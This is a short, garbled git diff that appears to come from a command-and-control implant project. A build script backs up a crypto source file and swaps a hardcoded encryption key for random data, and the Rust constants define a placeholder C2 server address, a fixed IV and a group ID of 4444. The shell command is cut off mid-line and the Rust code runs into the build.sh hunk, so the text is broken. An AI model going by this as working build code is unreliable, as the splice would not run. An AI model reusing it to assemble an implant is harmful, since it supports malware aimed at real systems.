diff --git a/build.sh b/build.sh index 15b1d44..12fd4af 100644 --- a/build.sh +++ b/build.sh @@ -5,9 +5,10 @@ echo "[!] Preparing..." cp src/crypto.rs src/crypto.rs.bak echo "[i] Replacing key with random data." export KEY="$(tr -dc A-Za-z0-9 ; -const KEY: &[u8] = b"kYmfk8pkMkgR9nj3EQ4x0JuJn6Qwq0cQ"; +const KEY: &[u8] = b"tobereplacedbybuildscript"; const IV: &[u8] = b"unique_initializ"; // IV should be 16 bytesA const C2ADDR: &str = "c2serveraddr"; const GID: i32 = 4444;